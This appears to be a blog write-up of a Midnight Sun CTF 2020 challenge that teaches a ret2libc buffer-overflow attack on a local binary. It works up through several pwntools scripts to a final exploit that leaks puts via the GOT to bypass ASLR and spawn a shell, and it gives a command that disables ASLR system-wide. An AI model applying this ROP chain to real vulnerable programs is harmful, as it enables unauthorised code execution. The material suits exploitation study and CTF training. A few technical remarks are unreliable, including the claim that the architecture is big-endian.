Binary Exploitation: Exploiting Ret2Libc

sharkmoos
8 min readFeb 25, 2021

A ret2libc (return to libc) attack is one in which the attacker does not require any shellcode to take control of a target via a vulnerable binary. This is a way of exploiting binaries with have NX (non executable) stack enabled. We will first execute a ret2libc attack with ASLR disabled, to show the method, and then re enable ASLR and adapt our exploit to overcome this protection.

Our example binary is from the Midnight Sun CTF 2020 qualifier competition.

Head over to my website for better formatted code snippets, and the binary if you want to follow along.

To confirm the security measures, we can use checksec. This confirms that the binary has NX Stack enabled, and partial relro (pointers in the GOT for libc are different each time the program is run).

Checksec Output

Running the binary shows this:

Running the Binary

Since we are going to exploit without ASLR to begin, lets disable ASLR on our system.

echo 0 > /proc/sys/kernel/randomize_va_space

Lets decompile the binary with IDA. Decompiling the main function revealed that gets is used to retrieve the user input, and saved it to var_40. There is no check to verify the user input has not exceeded the max buffer size, and so we can execute a buffer overflow attack.

Main function from IDA Free

Before starting to write the exploit, we should note the location of our libc library that the binary relies on.

> ldd pwn1

linux-vdso.so.1 (0x00007ffff7fca000)

libc.so.6 => /usr/lib/libc.so.6 (0x00007ffff7dce000)

/lib64/ld-linux-x86–64.so.2 => /usr/lib64/ld-linux-x86–64.so.2 (0x00007ffff7fcc000)

Binary Exploitation with Pwntools

For developing the exploit, we will use pwntools. Pwntools is a useful exploit development library for Python which significantly simplifies the exploit process. We can quickly write a wire frame of the exploit.

#!/usr/bin/python3
from pwn import *
from struct import pack

p = process(‘./pwn1’) # Run binary
input(“Attach GDB and press enter”) # Let user attach to gdb
binary = ELF(‘./pwn1’) # load the binary into pwntools
context.binary = binary # configure pwntools settings to match binary

libc = ELF(‘/usr/lib/libc.so.6’) # Location or our libc library
rop = ROP(binary) # Will help look for gadgets and building rop chains

p.recvuntil(“buffer:”) # Stop when program outputs this string
p.interactive() # Allow user interaction

In gdb we enter a string of 100 characters into the program, this causes a segmentation fault, meaning we have overflowed the buffer. We know the buffer must be 100 bytes or less.

Gef view of registers

We can identify the offset by using the pattern create function from gef. The pattern is a string of characters where no group of 4 characters are the same. This allows us to analyse registers and identify how many bytes it took to fill a register.

gef➤ pattern create 80

[+] Generating a pattern of 80 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaa

We can then rerun the binary and enter the new string.

Found offset in Gef

We know the architecture is big-endien and so the offset is 72. We need 72 bytes of data in order to overwrite the $rsp. The bytes after this will be written into the instruction pointer ($rip).

We should also make a note of the address of the ret instruction, this will help us debug our exploit. We can now craft a payload in order to verify we have control over the instruction pointer.

Our updated exploit looks like this:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = process(‘./pwn1’)

input(“Attach GDB and press enter”)

binary = ELF(‘./pwn1’)
context.binary = binary
rop = ROP(binary)
libc = ELF(‘/usr/lib/libc.so.6’)
p.recvuntil(“buffer:”)

OFFSET = 72 # Size of junk to fill

rop.raw(“A” * OFFSET)
rop.raw(0xdeadbeef)

p.sendline(rop.chain()) # Send our rop objects
p.interactive()

Analysing the stack in gdb we can confirm that we have overwritten the $rip with our own string.

Controlled instruction pointer

We can now move onto trying to get a shell. Remember, NX-Stack is enabled so we cannot execute data (such as shellcode) in the stack. We must use return oriented programming (rop).

The libc library that is used by the binary has access to the function system. We can leverage the loaded libc library in memory to redirect the control flow and call system(“/bin/sh”) — triggering the shell.

One way to execute our function would be to put a pointer to the string (“/bin/sh”) into $rdi. We can use a pointer from the libc library and use pwntools to look it up using this code snippet.

next(libc.search(b’/bin/sh’))

Next, we need to find a gadget that that can get data from the stack into $rdi, and ends with a return. We can use the ropper function in Gef to find this gadget.

Found Gadget

We also need the base address of libc in the binaries virtual memory. We can use the ldd location we made a note of.

We also need to get a pointer to system. We can use pwntools to find one in libc.

libc.symbols[‘system’]

So our payload looks like this abstraction:

junk “A”s * 72 + pop rdi ret gadget + ptr to “/bin/bash” + ptr to system

Our exploit code now looks like this:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = process(‘./pwn1’) # Set a breakpoint at the ret instruction

input(“Attach GDB and press enter”)

binary = ELF(‘./pwn1’)
context.binary = binary
rop = ROP(binary)
libc = ELF(‘/usr/lib/libc.so.6’)
p.recvuntil(“buffer:”)

OFFSET = 72

libc.address = 0x00007ffff7dce000 # taken from the ldd command
rop.raw(“A” * OFFSET)
rop.raw(0x400783) # Location of pop_rdi gadget
rop.raw(next(libc.search(b’/bin/sh’)))
rop.raw(libc.symbols[‘system’])

p.sendline(rop.chain()) # Send our rop objects
p.interactive()

We successfully got our shell! This means we managed to redirect the execution flow to /bin/sh.

Got a shell

With ASLR Enabled

Lets reenable ASLR

echo 2 > /proc/sys/kernel/randomize_va_space

When we try and run the exploit now, it fails.

This is because the base address of the string and functions are randomised each time the binary is run. We can visualise this by running ldd on the binary a few times.

We can see that the location of our libraries keeps changing.

We need to create a way to determine the address of system. If we have a way to find a pointer to any function from libc, and have the systems libc binary, we can calculate the shared libraries base address. These function pointers have a constant offset from the start of the shared binary so we can subtract the pointer with the constant to get the base address of libc.

This sounds complicated, but pwntools can help us.

We will call the puts function to print a pointer to the terminal. We can call puts, but not system, due to the fact the binary was not complied with a position independent code flag, therefore the binary relies on a fixed offset to the procedural linking table (PLT). Any function inside PLT has a static address. The compiler will reference every function used in the binary inside a lookup table called the global offset table (GOT). So puts exists in the PLT, but system does not. This is why we can call puts but not system.

To summarise, the PLT is needed to find the shared library function and the GOT hold the reference to the pointer itself.

We can see what the puts function looks like before the lazy binding has occurred by disassembling it before it is called.

gef➤ starti
gef➤ b gets
gef➤ disas puts

Dump of assembler code for function puts@plt:
0x0000000000400550 <+0>: jmp QWORD PTR [rip+0x201ac2] # 0x602018 <puts@got.plt>
0x0000000000400556 <+6>: push 0x0
0x000000000040055b <+11>: jmp 0x400540
End of assembler dump.

As we can see, it does not contain the full function, simply a stub/reference to another location. This is the PLT stub for puts. The first instruction in the puts stub is a pointer to a GOT entry. We can see the value of this.

gef➤ x/qx 0x602018
0x602018 <puts@got.plt>: 0x00400556

We can see that our GOT entry points to the second instruction in the puts PLT stub. However, if we let the program run into the breakpoint, and then see the value, we can see it has changed.

gef➤ c
gef➤ x/qx 0x602018
0x602018 <puts@got.plt>: 0xf7e44d10

The GOT entry has been populated with a pointer to libc gets. If we disassemble puts now, we see the whole function rather than the PLT stub.

gef➤ disas puts
Dump of assembler code for function puts:
0x00007ffff7e44d10 <+0>: endbr64
0x00007ffff7e44d14 <+4>: push r14
0x00007ffff7e44d16 <+6>: push r13
0x00007ffff7e44d18 <+8>: push r12
0x00007ffff7e44d1a <+10>: mov r12,rdi
0x00007ffff7e44d1d <+13>: push rbp
[…]

We know that we need to leak the pointer stored in the GOT of puts. We know that the entry will only be populated after it has been called, due to the lazy binding. By leaking the GOT entry before the function is called, we will get a pointer tho the function PLT stub rather than the full function. Unfortunately we cannot calculate base libc by just using the PLT stub.

How do we leak the address by accessing puts after it has been called, but before the binary exits? We can add another pointer to the end of our exploit payload that points to the start of the main function.

To summarise, we will attack like this:

1. Send our payload to overwrite the saved return pointer to call puts (PLT) to print out the puts (got).

2. Redirect the execution flow back the start of the main function

3. Calculate the base address of libc from the leaked pointer

4. Create a second payload, with the correct offsets for /bin/sh and system.

5. Launch second payload on second pass of the main function

Final Exploit

#!/usr/bin/python3

from pwn import *
from struct import pack

p = process(‘./pwn1’) # Set a breakpoint at the ret instruction
input(“Attach GDB and press enter”)

binary = ELF(‘./pwn1’)
context.binary = binary
rop = ROP(binary)

libc = ELF(‘/usr/lib/libc.so.6’)
OFFSET = 72 # Offset the buffer

rop.raw(“A” * OFFSET)
rop.puts(binary.got[‘puts’])

rop.call(0x400698) # Address on function main

print(rop.dump())

p.recvuntil(“buffer:”)
p.sendline(rop.chain())
leakedPuts = p.recvline()[:8].strip()
print(“Leaked puts@GLIBC: {}”.format(leakedPuts))

leakedPuts = int.from_bytes(leakedPuts, byteorder=’little’)
libc.address = leakedPuts — libc.symbols[‘puts’]

rop2 = ROP(libc)
rop2.raw(“A” * OFFSET)

pop_rdi = p64(0x400783) # Location of pop_rdi gadget
sh = p64(next(libc.search(b’/bin/sh’))) # target
system = p64(libc.symbols[‘system’])
padding = (b”A” * OFFSET)

p.recvuntil(“buffer:”)

payload = padding + pop_rdi + sh + system
print(sh)
p.sendline(payload) # Send our rop objects
p.interactive()

That’s it for this writeup. To recap, we exploited a binary with and NX-Stack that was vulnerable ret2libc, without ASLR. Then we re enabled ASLR and executed a ret2plt attack in order to leak the relevant addresses, loop back to the main function and get a shell using a second payload.

I hope this article is understandable. I may write more binary exploitation in the future.

--

--

sharkmoos

Novice Cyber Security Enthusiast. I like sharing what I’ve learnt